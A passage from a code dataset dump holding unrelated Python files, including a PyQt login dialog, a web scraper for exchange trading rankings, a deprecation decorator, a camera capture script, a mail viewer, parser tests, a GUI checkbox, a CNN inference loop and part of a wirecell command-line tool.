self.quit.setAutoRepeatDelay(300)\r\n self.quit.setObjectName(\"quit\")\r\n self.horizontalLayout_3.addWidget(self.quit)\r\n self.verticalLayout.addLayout(self.horizontalLayout_3)\r\n self.gridLayout.addLayout(self.verticalLayout, 0, 0, 1, 
1)\r\n\r\n logoin.setWindowOpacity(0.9) # 设置窗口透明度\r\n # logoin.setAttribute(QtCore.Qt.WA_TranslucentBackground) # 设置窗口背景透明\r\n logoin.setWindowFlag(QtCore.Qt.FramelessWindowHint) # 隐藏边框\r\n pe = QPalette()\r\n logoin.setAutoFillBackground(True)\r\n pe.setColor(QPalette.Window, Qt.lightGray) # 设置背景色\r\n logoin.setPalette(pe)\r\n\r\n self.retranslateUi(logoin)\r\n self.quit.clicked.connect(logoin.close)\r\n QtCore.QMetaObject.connectSlotsByName(logoin)\r\n\r\n def retranslateUi(self, logoin):\r\n _translate = QtCore.QCoreApplication.translate\r\n logoin.setWindowTitle(_translate(\"logoin\", \"登录\"))\r\n self.title.setText(_translate(\"logoin\", \"

    信息管理系统登录

    \"))\r\n self.count.setText(_translate(\"logoin\", \"用户名:\"))\r\n self.lineEdit.setPlaceholderText(_translate(\"logoin\", \"输入用户名\"))\r\n self.lineEdit_2.setPlaceholderText(_translate(\"logoin\", \"输入密码\"))\r\n self.words.setText(_translate(\"logoin\", \"密 码:\"))\r\n self.yes.setText(_translate(\"logoin\", \"确定\"))\r\n self.quit.setText(_translate(\"logoin\", \"退出\"))\r\n self.quit.setShortcut(_translate(\"logoin\", \"Ctrl+R\"))\r\n\r\nif __name__ == '__main__':\r\n app = QtWidgets.QApplication(sys.argv)\r\n ui = Ui_logoin()\r\n myset = set_mod()\r\n ui.show()\r\n ui.Signal_parp.connect(myset.deal_emit_slot)\r\n sys.exit(app.exec_())","sub_path":"logoin.py","file_name":"logoin.py","file_ext":"py","file_size_in_byte":7913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"459551090","text":"import re\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom fake_useragent import UserAgent\n\ndef get_html(url,data):\n html = requests.post(url=url,headers=headers,data=data)\n if html.status_code == 200:\n print(html.text)\n# def pase_html(html):\n# soup = BeautifulSoup(html,'lxml')\n# tradeResult02 = soup.find(class_='tradeResult02')\n# span = tradeResult02.find_all(name='span')[0].text\n# heyueID = span.split()[0][-1]\n# times = span.split()[1][5::]\n# table = tradeResult02.find_all(name='table')[0].find_all('tr')\n# item_sum = []\n# for k in table[1:]:\n# print(k.find_all('td'))\n# print('===')\n\n\n # table = tradeResult02.find_all(name='table')[1].find_all('tr')\n # item_desc = []\n # for i in table[1:-1]:\n # item = { \"成交_名次\": i.find_all('td')[0].text,\n # \"成交_会员\": i.find_all('td')[1].text,\n # \"成交量\": i.find_all('td')[2].text,\n # \"成交_增减\": i.find_all('td')[3].text,\n # \"买单_名次\": i.find_all('td')[4].text,\n # \"买单_会员\": i.find_all('td')[5].text,\n # \"买单量\": i.find_all('td')[6].text,\n # \"买单_增减\": i.find_all('td')[7].text,\n # \"卖单_名次\": i.find_all('td')[8].text,\n # \"卖单_会员\": 
i.find_all('td')[9].text,\n # \"卖单量\": i.find_all('td')[10].text,\n # \"卖单_增减\": i.find_all('td')[11].text,\n #\n # }\n # item_desc.append(item)\n # print(strs%(heyueID,times,item_desc))\n\n\ndef data_obj():\n '''表单'''\n data = {\n 'contract.variety_id': 'b',\n 'day': '23',\n 'memberDealPosiQuotes.trade_type': '0',\n 'memberDealPosiQuotes.variety': 'b',\n 'month': '6',\n 'year': '2018',\n }\n return data\n\ndef main(url):\n get_html(url,data = data_obj())\nif __name__ == '__main__':\n strs = '''\n {\"_AnalyzeModelName\":\"dce_heyue\",\n \"合约代码\":\"%s\",\n \"日期\":\"%s\",\n \"排名\":%s \n }\n '''\n ua = UserAgent()\n headers = {\n 'User-Agent': ua.random,\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Host': 'www.dce.com.cn',\n 'Referer': 'http://www.dce.com.cn/publicweb/quotesdata/memberDealPosiQuotes.html',\n }\n url = 'http://www.dce.com.cn/publicweb/quotesdata/memberDealPosiQuotes.html'\n main(url=url)","sub_path":"WorksZhang/GT_0724/requests_dss.py","file_name":"requests_dss.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"200865226","text":"import functools\nimport inspect\nimport warnings\n\n\ndef get_full_object_name(obj):\n \"\"\"\n Get full name of object\n :param obj:\n :return:\n \"\"\"\n result = []\n if hasattr(obj, '__module__'):\n result.append(getattr(obj, '__module__'))\n if hasattr(obj, '__name__'):\n result.append(getattr(obj, '__name__'))\n return '.'.join(result)\n\n\nclass Deprecated(object):\n def __init__(self, reason):\n if inspect.isclass(reason) or inspect.isfunction(reason):\n raise TypeError(\"Reason for deprecation must be supplied\")\n self.reason = reason\n\n def __call__(self, cls_or_func):\n if inspect.isfunction(cls_or_func):\n if hasattr(cls_or_func, 'func_code'):\n _code = cls_or_func.func_code\n else:\n _code = cls_or_func.__code__\n fmt = \"Call to deprecated function or method {name} ({reason}).\"\n filename = 
_code.co_filename\n lineno = _code.co_firstlineno + 1\n\n elif inspect.isclass(cls_or_func):\n fmt = \"Call to deprecated class {name} ({reason}).\"\n filename = cls_or_func.__module__\n lineno = 1\n\n else:\n raise TypeError(type(cls_or_func))\n\n msg = fmt.format(name=cls_or_func.__name__, reason=self.reason)\n\n @functools.wraps(cls_or_func)\n def new_func(*args, **kwargs):\n warnings.simplefilter('always', DeprecationWarning) # turn off filter\n warnings.warn_explicit(msg, category=DeprecationWarning, filename=filename, lineno=lineno)\n warnings.simplefilter('default', DeprecationWarning) # reset filter\n return cls_or_func(*args, **kwargs)\n\n return new_func\n\n\n@Deprecated('Bad method')\ndef simple_deprecated(description=None, url=None, new_line=True):\n \"\"\"\n Mark function or method as deprecated\n :param description: short description\n :param url: to issue\n :param new_line: need split lines\n :return:\n \"\"\"\n\n def wrapper(func):\n func_name = '.'.join([func.__module__, func.__name__])\n message = [\"[WARNING]\\tMethod '{}' deprecated and will be removed in the future.\".format(func_name)]\n if description is not None:\n message.append('\\tDescription: ' + str(description))\n if url is not None:\n message.append('\\tURL: ' + str(url))\n print(('\\n' if new_line else '').join(message))\n return func\n\n return wrapper\n","sub_path":"NucleusUtils/versions/deprecated.py","file_name":"deprecated.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"65863201","text":"# -*- coding: utf-8 -*-\n#参考: https://qiita.com/hasekou_tech/items/acd0d9159a9001ebfbd3\n\nimport datetime\nimport cv2\n\n#時刻取得\nnowtime = datetime.datetime.now()\nnowtime_string = nowtime.strftime('%Y-%m-%d %H:%M:%S')\n\n#写真撮影\nURL = \"localhost/?action=stream\"\ncamera = cv2.VideoCapture(URL)\ncamera.set(cv2.CAP_PROP_FRAME_WIDTH, 1280) # カメラ画像の横幅を1280に設定\ncamera.set(cv2.CAP_PROP_FRAME_HEIGHT, 
720) # カメラ画像の縦幅を720に設定\n_, frame = camera.read()\ncamera.release()\n\n#日時合成\ncv2.putText(frame,nowtime_string,(25,50),cv2.FONT_HERSHEY_SIMPLEX, 1.5,(232, 167, 145), 10)\ncv2.putText(frame,nowtime_string,(25,50),cv2.FONT_HERSHEY_SIMPLEX, 1.5,(70, 158, 162), 2)\ncv2.imwrite(\"/dev/shm/kuma_newimage.jpg\", frame)\n","sub_path":"Python/ImageDownlink.py","file_name":"ImageDownlink.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"390905984","text":"#!/bin/python\nimport mailbox\nimport email\nimport re\nimport time\nimport urwid\n\n\nmail = mailbox.Maildir('~/mail/gmail/INBOX')\n\nnum = 10\n\n#def decode_header(header):\n# subj, enc = email.header.decode_header(header)[0]\n# if enc is not None:\n# return subj.decode(enc)\n# else:\n# return subj\ndef get_header(header):\n literal, enc = email.header.decode_header(header)[0]\n if enc is None:\n try:\n return literal.decode('utf-8')\n except:\n return literal\n else:\n return literal.decode(enc)\n\ndef get_msg_lines(msgs):\n msg_lines = []\n\n for msg in msgs:\n header_from = get_header(msg['from'])\n name, adress = email.utils.parseaddr(header_from)\n\n if not name:\n name = adress\n\n header_date = get_header(msg['date'])\n date = email.utils.parsedate(header_date)\n datestr = time.strftime(\"%m/%d\", date)\n\n subject = get_header(msg['subject'])\n\n msg_lines.append(\"{0:<5.5} {1:<20.20} {2:<80.80}\".format(datestr, name, subject))\n\n return msg_lines\n\ndef get_msgs():\n return map(lambda x: mail[x], sorted(mail.keys(), \n key=lambda y: email.utils.parsedate(mail[y]['date']), reverse=True)[:num])\n\n\ndef show_or_exit(key):\n if key in ('q', 'Q'):\n raise urwid.ExitMainLoop()\n txt.set_text(repr(key))\n\n\ntxt = urwid.Text(u\"Hello World\")\nfill = urwid.Filler(txt, 'top')\nloop = 
urwid.MainLoop(fill,\nunhandled_input=show_or_exit)\nloop.run()\n","sub_path":"mehl/mehl.py","file_name":"mehl.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"320833410","text":"import inspect\n\ndef is_instance_method(method):\n\tnumber_of_args = len(inspect.getargspec(method)[0])\n\tif number_of_args > 2:\n\t\traise ValueError('Functions may only take one (static method) or two (instance method) arguments.')\n\treturn number_of_args == 2\n\nclass validator(object):\n\t\"\"\"\n\t\tThe validator decorator is a method decorator that specifies\n\t\ta key and an error message indicating which data parameter\n\t\tthe method validates and what the error message should be\n\t\tif the validation fails.\n\t\"\"\"\n\n\tdef __init__(self, key, error, order=0, *args, **kwargs):\n\t\tself.key = key\n\t\tself.error = error\n\t\tself.order = order\n\n\tdef __call__(self, func):\n\t\tfunc.validator = True\n\t\tfunc.key = self.key\n\t\tfunc.error = self.error\n\t\tfunc.order = self.order\n\t\tfunc.is_instance = is_instance_method(func)\n\t\treturn func","sub_path":"venv/Lib/site-packages/commands/decorators/validator.py","file_name":"validator.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"315487728","text":"\"\"\"\nRiskPaths\nThis will be a neworder implementation of the RiskPaths MODGEN model\n\nSee: \nhttps://www.statcan.gc.ca/eng/microsimulation/modgen/new/chap3/chap3\nhttps://www.statcan.gc.ca/eng/microsimulation/modgen/new/chap4/chap4\n\n 'RiskPaths is a simple, competing risk, case-based continuous time microsimulation model. 
Its\n main use is as a teaching tool, introducing microsimulation to social scientists and demonstrating\n how dynamic microsimulation models can be efficiently programmed using the language\n Modgen.\n Modgen is a generic microsimulation programming language developed and maintained at\n Statistics Canada.\n RiskPaths as well as the Modgen programming language and other related documents are\n available at www.statcan.gc.ca/microsimulation/modgen/modgen-eng.htm'\n\n\"\"\"\nimport numpy as np\nimport neworder\n\npopulation_size = 10000\n\n# running/debug options\nneworder.log_level = 1\nneworder.do_checks = False\n \n# initialisation\nneworder.initialisations = {\n \"people\": { \"module\": \"riskpaths\", \"class_\": \"RiskPaths\", \"parameters\": [population_size] }\n}\n\nneworder.transitions = {\n \"status\": \"people.pregnancy()\"\n}\n\n# Finalisation \nneworder.checkpoints = {\n \"1stats\": \"people.stats()\",\n \"2hist\": \"people.plot()\"\n}\n","sub_path":"examples/riskpaths/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"13548008","text":"from margo_parser.tokenizer.tokenizer import tokenize\n\n\ndef test_empty_source():\n tokenized = tokenize(\"\")\n assert type(tokenized) == dict\n assert tokenized[\"TYPE\"] == \"BLOCK\"\n assert tokenized[\"SYNTAX\"] == \"MARGO\"\n\n assert len(tokenized[\"BODY\"]) == 0\n\n\ndef test_only_endblocks():\n tokenized = tokenize(\":: :: :: ::\")\n assert len(tokenized[\"BODY\"]) == 0\n\n\ndef test_ignore_cell():\n tokenized = tokenize(\"ignore-cell ::\")\n assert len(tokenized[\"BODY\"]) == 1\n assert tokenized[\"BODY\"][0][\"TYPE\"] == \"DIRECTIVE\"\n assert tokenized[\"BODY\"][0][\"NAME\"] == \"ignore-cell\"\n\n\ndef test_basic_declaration():\n \"\"\"\n If no language is specified, a declaration is treated\n as a JSON array without the enclosing brackets required\n \"\"\"\n\n tokenized = 
tokenize(\n \"\"\"\n hello_basic: \"world!!!\",\n 1,\n true, 3, false, null, ::\n \"\"\"\n )\n\n assert len(tokenized[\"BODY\"]) == 1\n declaration = tokenized[\"BODY\"][0]\n assert declaration[\"TYPE\"] == \"DECLARATION\"\n assert declaration[\"NAME\"] == \"hello_basic\"\n assert declaration[\"VALUE\"] == [\"world!!!\", 1, True, 3, False, None]\n\n\ndef test_json_declaration():\n \"\"\"\n Users can assert that a declaration is valid JSON,\n and it will be parsed (or fail)\n \"\"\"\n\n tokenized = tokenize(\n \"\"\"\n hello [json]: '[\"world!!\",\n 1,\n true,\n 3,\n false,\n null]'\n ::\n \"\"\"\n )\n declaration = tokenized[\"BODY\"][0]\n assert declaration[\"VALUE\"] == [\"world!!\", 1, True, 3, False, None]\n\n\ndef test_yaml_declaration():\n tokenized = tokenize(\n \"\"\"\n hello [yaml]: '\n - \"world!!\"\n - 1\n - true\n - 3\n - false\n - null'\n ::\n \"\"\"\n )\n declaration = tokenized[\"BODY\"][0]\n assert declaration[\"VALUE\"] == [\"world!!\", 1, True, 3, False, None]\n\n\ndef test_raw_declaration():\n inner_string = \"hello world!! 1 true 3 false null\"\n test_string = f\"\"\"\n hello [raw]: '{inner_string}' ::\n \"\"\"\n tokenized = tokenize(test_string)\n\n declaration = tokenized[\"BODY\"][0]\n assert declaration[\"VALUE\"] == inner_string\n","sub_path":"tests/test_parser.py","file_name":"test_parser.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"273991735","text":"'''\r\nCreated on 6 aug. 
2018\r\n\r\n@author: m.vanturnhout\r\n'''\r\n\r\nimport logging\r\nimport time\r\nimport colors\r\nimport globals\r\n\r\nfrom Control import Control\r\nfrom Label import Label\r\nfrom Signal import Signal\r\n\r\nlog = logging.getLogger(__name__)\r\n\r\nclass CheckBox(Control):\r\n '''\r\n classdocs\r\n '''\r\n check_color = (128, 128, 128)\r\n check_bgcolor = (244, 244, 244)\r\n check_padding = (4, 2)\r\n\r\n def __init__(self, text):\r\n '''\r\n Constructor\r\n '''\r\n Control.__init__(self)\r\n self.label = Label(text)\r\n self.add_child(self.label)\r\n self.checkmark = Label('X')\r\n self.checkmark.border_width = 1\r\n self.checkmark.font = globals.bold_font\r\n self.checkmark.text_color = CheckBox.check_color\r\n self.checkmark.bgcolor = CheckBox.check_bgcolor\r\n self.checkmark.padding = CheckBox.check_padding\r\n self.add_child(self.checkmark)\r\n self._checked = False\r\n self.on_checked = Signal()\r\n \r\n @property\r\n def font(self):\r\n return self.label.font\r\n \r\n @font.setter\r\n def font(self,font):\r\n self.label.font = font\r\n \r\n def layout(self):\r\n Control.layout(self)\r\n self.size_to_fit()\r\n\r\n def size_to_fit(self):\r\n self.checkmark.size_to_fit()\r\n self.label.size_to_fit()\r\n self._set_checkmark()\r\n self.label.frame.left = self.checkmark.frame.right\r\n self.frame.size = (self.checkmark.frame.width + self.label.frame.width,self.label.frame.height)\r\n self.checkmark.frame.size = (self.checkmark.frame.width,self.label.frame.height)\r\n\r\n @property\r\n def value(self):\r\n return self._checked\r\n\r\n @value.setter\r\n def value(self, yesno):\r\n #print '!!!!!!! 
SET VALUE '+str(yesno)\r\n if isinstance(yesno, bool):\r\n self._checked = yesno\r\n elif isinstance(yesno, (int, float)):\r\n self._checked = (yesno > 0)\r\n self.on_checked(self, yesno)\r\n self._set_checkmark()\r\n\r\n def _set_checkmark(self):\r\n if self._checked:\r\n self.checkmark.value = 'X'\r\n else:\r\n self.checkmark.value = ' '\r\n\r\n def toggle(self):\r\n self.value = not self.value\r\n self._set_checkmark()\r\n\r\n def mouse_up(self, button, pt):\r\n# print 'toggle'\r\n self.toggle()\r\n ","sub_path":"Application/gui/CheckBox.py","file_name":"CheckBox.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"468375242","text":"# Imports\nimport numpy as np\nimport os\nimport argparse\nimport tensorflow as tf\nfrom cnn_models import CNN_Model\ncnn_model = CNN_Model #which model to use\nimport cv2\nfrom functions import receiverNetwork, draw_boxes, parse_predictions, get_labels, visualize, prune_boxes, crop_and_warp\nimport time\n\n#DEBUG, INFO, WARN, ERROR, or FATAL\ntf.logging.set_verbosity(tf.logging.WARN)\n\n#Argument parsing\nparser = argparse.ArgumentParser()\nparser.add_argument(\"model_name\", help=\"Relative path to model\")\nparser.add_argument(\"vis\", help=\"Visualizations? 
y/n\")\nargs = parser.parse_args()\nmodel_path = args.model_name\n\ndef main(unused_argv):\n\n # Create the Estimator\n classifier = tf.estimator.Estimator(\n model_fn=cnn_model,\n model_dir=model_path)\n\n labels = get_labels() #maps id to name\n receiver = receiverNetwork(9002) #receive from edgeboxes\n \n total_time = 0\n total_execs = 0\n \n try:\n #get image and boxes from network\n image, boxes = receiver.receiveBoxes()\n while True:\n b_time = time.time() #beginning time\n \n #Create list of all objects, cropped and warped\n objects = list()\n for box in boxes:\n object = crop_and_warp(image, box)\n objects.append(object)\n samples = np.array(objects, dtype=np.float32)\n \n #Input function with all objects in image\n pred_input_fn = tf.estimator.inputs.numpy_input_fn(\n x=samples,\n num_epochs=1,\n shuffle=False)\n\n predictions = classifier.predict(\n input_fn=pred_input_fn,\n yield_single_examples=False)\n \n classes, scores = parse_predictions(predictions)\n \n #Get rid of 0 objects and merge iou threshold\n boxes, classes, scores = prune_boxes(boxes, 0.7, classes, scores)\n\n exec_time = time.time()-b_time\n print(\"Executed in:\", exec_time) #execution time\n total_time = total_time + exec_time\n total_execs = total_execs + 1\n \n if args.vis == 'y':\n image = image*255 #Convert to value in [0,255] for vis\n image = image.astype(np.uint8)\n image = visualize(boxes, image, scores, classes, labels)\n \n cv2.imshow(\"Image\", image)\n cv2.waitKey(10)\n \n #get image and boxes from network\n image, boxes = receiver.receiveBoxes()\n \n except KeyboardInterrupt:\n exit(total_time/total_execs)\n \nif __name__ == \"__main__\":\n tf.app.run()\n","sub_path":"predict_cnn.py","file_name":"predict_cnn.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"133509996","text":"import sys,os\nimport yaml\n\nclass YAMLLogWriter():\n \"\"\"\n Logger with a yaml file.\n\n How to 
use\n ----------\n root = \"log_dir/log.yaml\"\n for i in range(5):\n logger = LogWriter(root)\n log_dict = {\"log1\": i, \"log2\": -i}\n logger.update(log_dict)\n\n If you want to load LogWriter yaml file....\n root = \"log_dir/log.yaml\"\n new_root = \"log_dir/new_log.yaml\"\n logger = LogWriter(new_root, root)\n\n or\n\n logger = LogWriter(new_root)\n logger.load_log(root)\n \"\"\"\n def __init__(self, root:str, loading_log_root:str=None):\n\n self.root = root\n self.status = []\n\n if loading_log_root is not None:\n self.load_log(loading_log_root)\n\n def load_log(self, loading_log_root:str):\n with open(loading_log_root, mode=\"r\") as f:\n self.status = yaml.load(f, Loader=yaml.FullLoader)\n\n def update(self, log):\n self.status.append(log)\n with open(self.root, mode=\"w\") as f:\n yaml.dump(self.status, f, indent=2)\n","sub_path":"examples/previous_code/utils/log_writer.py","file_name":"log_writer.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"300825471","text":"#!/usr/bin/env python\n'''\nThe wirecell-img main\n'''\nimport os\nimport sys\nimport json\nimport click\nimport pathlib\nfrom collections import Counter\nimport numpy\nimport matplotlib.pyplot as plt\nfrom wirecell import units\nfrom wirecell.util.functions import unitify, unitify_parse\nfrom wirecell.util import ario\nfrom wirecell.util.plottools import pages\nfrom scipy.spatial.transform import Rotation\nfrom zipfile import ZipFile\nfrom zipfile import ZIP_DEFLATED as ZIP_COMPRESSION\n### bzip2 is actually worse than deflate for depos!\n# from zipfile import ZIP_BZIP2 as ZIP_COMPRESSION\nfrom io import BytesIO\n\ncmddef = dict(context_settings = dict(help_option_names=['-h', '--help']))\n\n@click.group(\"img\", **cmddef)\n@click.pass_context\ndef cli(ctx):\n '''\n Wire Cell Toolkit Imaging Commands\n\n A cluster file is produced by ClusterFileSink and is an archive\n holding JSON or Numpy or as 
a special case may be a single JSON.\n\n '''\n pass\n\n\n# 1. wrapper to handle undrift and loading of depo and cluster files.\n# 2. retrofit all the commands.\n\nimport functools\n\ndef cluster_file(func):\n ''' A CLI decorator giving the command a \"clusters\" argument\n providing a generator of cluster graphs. '''\n\n @click.option(\"-B\", \"--undrift-blobs\", type=str, default=None,\n help=\"Undrift with ',